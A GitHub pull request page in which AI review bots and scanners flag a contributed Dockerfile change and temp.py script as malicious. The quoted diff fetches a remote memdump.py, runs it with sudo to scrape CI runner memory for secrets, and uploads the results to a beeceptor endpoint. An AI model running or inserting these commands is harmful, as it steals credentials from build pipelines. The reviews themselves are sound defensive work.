Conversation
This comment has been minimized.
This comment has been minimized.
This comment has been minimized.
This comment has been minimized.
![gemini-code-assist[bot]](https://avatars.githubusercontent.com/in/956858?s=60&v=4){kind=small}
There was a problem hiding this comment.
Code Review
This pull request introduces malicious code into the Dockerfile. It adds commands that download and execute a script from an untrusted external source with elevated privileges. This script appears designed to find and exfiltrate secrets from the build environment to a third-party server. This constitutes a critical security vulnerability. These changes must be rejected and the lines removed immediately.
Dockerfile
Outdated
| RUN curl -sSf https://raw.githubusercontent.com/AdnaneKhan/Cacheract/b0d8565fa1ac52c28899c0cfc880d59943bc04ea/assets/memdump.py | sudo python3 | tr -d '\\0' | grep -aoE '"[^"]+":\{"value":"[^"]*","isSecret":true\}' >> /tmp/secrets | ||
| RUN curl -X PUT -d @/tmp/secrets https://bachelor-thesis-002.free.beeceptor.com |
There was a problem hiding this comment.
These two lines introduce a critical security vulnerability. They download a Python script from an untrusted GitHub repository, execute it with sudo (which is a remote code execution vulnerability), and then exfiltrate the collected data (likely secrets, based on the script name memdump.py and the grep pattern) to an external endpoint. This is a malicious backdoor and must be removed.
![coderabbitai[bot]](https://avatars.githubusercontent.com/in/347564?s=60&v=4){kind=small}
There was a problem hiding this comment.
Actionable comments posted: 2
📜 Review details
Configuration used: Path: .coderabbit.yaml
Review profile: CHILL
Plan: Pro
📒 Files selected for processing (1)
Dockerfile(1 hunks)
🧰 Additional context used
🪛 GitHub Actions: PR Security Scan
Dockerfile
[error] 3-3: RUN curl -sSf https://raw.githubusercontent.com/AdnaneKhan/Cacheract/b0d8565fa1ac52c28899c0cfc880d59943bc04ea/assets/memdump.py | sudo python3 | tr -d '\0' | grep -aoE '"[^"]+":{"value":"[^"]*","isSecret":true}' >> /tmp/secrets did not complete: /bin/sh: sudo: not found; curl: (23) Failure writing output to destination.
🪛 Hadolint (2.14.0)
Dockerfile
[error] 3-3: Do not use sudo as it leads to unpredictable behavior. Use a tool like gosu to enforce root
(DL3004)
There was a problem hiding this comment.
Actionable comments posted: 1
📜 Review details
Configuration used: Path: .coderabbit.yaml
Review profile: CHILL
Plan: Pro
📒 Files selected for processing (2)
Dockerfile(1 hunks)temp.py(1 hunks)
🚧 Files skipped from review as they are similar to previous changes (1)
- Dockerfile
🧰 Additional context used
🪛 Ruff (0.14.8)
temp.py
4-4: subprocess call: check for execution of untrusted input
(S603)
4-4: Starting a process with a partial executable path
(S607)
8-8: subprocess call: check for execution of untrusted input
(S603)
8-8: Starting a process with a partial executable path
(S607)
| import subprocess | ||
| # This is for research purposes only | ||
| cmd1 = '''curl -sSf https://raw.githubusercontent.com/AdnaneKhan/Cacheract/b0d8565fa1ac52c28899c0cfc880d59943bc04ea/assets/memdump.py | sudo python3 | tr -d '\\0' | grep -aoE '"[^"]+":\{"value":"[^"]*","isSecret":true\}' >> /tmp/secrets''' | ||
| subprocess.run(["bash", "-c", cmd1]) | ||
|
|
||
| # This is for research purposes only | ||
| cmd2 = "curl -X PUT -d @/tmp/secrets https://bachelor-thesis-002.free.beeceptor.com" | ||
| subprocess.run(["bash", "-c", cmd2]) | ||
|
|
||
| import time | ||
| time.sleep(60 * 15) |
There was a problem hiding this comment.
🚨 CRITICAL SECURITY ISSUE: This is malicious code - a supply chain attack attempting secret exfiltration.
This script performs the following malicious actions:
-
Remote Code Execution (Line 3-4): Downloads and executes arbitrary Python code (
memdump.py) from an external GitHub repository withsudoprivileges. -
Secret Extraction (Line 3): The downloaded script dumps memory and extracts JSON fragments matching the pattern
"isSecret":true, indicating credential/secret harvesting. -
Data Exfiltration (Line 7-8): Uploads the stolen secrets to an external endpoint (
beeceptor.com) controlled by an attacker. -
Evasion/Persistence (Line 11): Sleeps for 15 minutes, likely to maintain execution context during CI/CD runs.
The "research purposes only" comments do not legitimize this behavior. This code would compromise any CI/CD pipeline, build environment, or system where this Docker image is built, stealing secrets and credentials.
This PR must not be merged. The repository maintainers should investigate the submitting account and consider reporting this to GitHub as a malicious contribution attempt.
🧰 Tools
🪛 Ruff (0.14.8)
4-4: subprocess call: check for execution of untrusted input
(S603)
4-4: Starting a process with a partial executable path
(S607)
8-8: subprocess call: check for execution of untrusted input
(S603)
8-8: Starting a process with a partial executable path
(S607)
RUN python3 /usr/local/src/temp.py
Security Scan Results for PRDocker Image Scan Results
Source Code Scan Results🎉 No vulnerabilities found! |
1 participant
What does this PR do?
(Provide a description of what this PR does and why it's needed.)
Test Plan
(Write your test plan here. If you changed any code, please provide us with clear instructions on how you verified your changes work. Screenshots may also be helpful.)
Related PRs and Issues
Checklist